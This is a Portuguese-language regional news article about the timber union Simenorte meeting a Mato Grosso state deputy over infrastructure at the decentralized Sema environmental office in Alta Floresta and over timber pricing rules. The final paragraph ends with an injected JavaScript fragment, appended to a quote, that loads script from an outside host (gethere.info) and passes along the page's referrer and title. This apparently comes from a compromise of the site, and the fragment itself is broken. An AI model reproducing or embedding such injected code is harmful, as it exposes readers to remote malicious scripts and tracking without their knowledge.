Capa / Cidades / Simenorte debate problemas do setor madeireiro com deputado

Simenorte debate problemas do setor madeireiro com deputado

WP_20160318_12_16_33_ProKariny Santos

A descentralização da Sema de Alta Floresta no último ano de 2015 foi de grande importância para Alta Floresta e região, porém a infraestrutura não é das melhores levando em conta que muitos serviços ainda são realizados em Cuiabá. Para discutir o assunto na última sexta-feira 18, o deputado Dilmar Dal’ Bosco esteve no município de Alta Floresta, e se reuniu com a classe madeireira na sede do Simenorte.
Objetivo da reunião segundo o presidente do Simenorte, Frank Rogieri, era debater a infraestrutura da sede decentralizada da Sema de Alta Floresta. “O objetivo principal da nossa reunião é discutir dentro dos problemas que nós temos hoje no setor de base florestal, discutir uma agenda positiva com o deputado para que a gente possa angariar junto ao Estado do Mato Grosso maiores investimento para a unidade regional da Sema de Alta Floresta”, disse Rogieri.
Segundo Frank a Sema é auto suficiente, mas está sobrecarregada e com pouca infraestrutura, e que mesmo com o empenho dos profissionais lotados na unidade da Sema local, não consegue suprir toda a demanda do setor. “Eles tem sido parceiros da gente mas chegou a hora do governo colocar a mão no bolso, nós precisamos estruturar a Sema, ela é auto suficiente, ela arrecada muito com processos de licenciamento ambiental, nada mais justo que este dinheiro ser canalizado para a nossa regional, para que isso se reverta em serviços prestados para o norte do Mato Grosso”, pontuou.
Outro ponto proposto pelo setor se dá em torno aos preços mínimos da madeira e no percentual de uso da tora. Uma resolução proposta pelo Ibama no Conama é a diminuição do índice de conversão da tora de madeira que passaria de 45% para 35%, para o presidente do Simenorte, trará um impacto muito grande econômico e financeiro para o setor madeireiro.
“Nós temos nesta discussão a confecção da nova pauta da madeira, que é a lista de preços mínimos que nós podemos praticar e isto vem sendo discutido junto com a federação das industrias de Mato Grosso, com a Sefaz e nós vamos pedir o empenho do deputado e o apoio da assembleia legislativa, para a gente minimizar isso mais uma vez vamos precisar do empenho do Governo do Estado”, ressaltou o presidente.
O deputado Dilmar Dal’Bosco lembrou que o projeto piloto implantado no escritório da Sema de Alta Floresta ainda não está funcionando 100%, mas que o modelo proposto é para que realmente melhore o atendimento e que tudo o que for relacionado a questão ambiental seja resolvido no município sem necessidade de encaminhar para a capital.
“O objetivo inicial é realizar a unificação dos sistemas para que a sede descentralizada da Sema de Alta Floresta possa realizar todas as funções aqui sem mandar para capital Cuiabá, nós estamos mudando os procedimentos o Estado estar modelando a secretaria de meio ambiente, facilitando o atendimento e não facilitando os processos ambientais mais diminuindo a burocracia que tem alguns procedimentos, simplificando os procedimentos agora eles estão sendo mais rápidos para analise do processo de manejo, como também a renovação do CC-Sema que o setor precisa muito”, pontuou.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top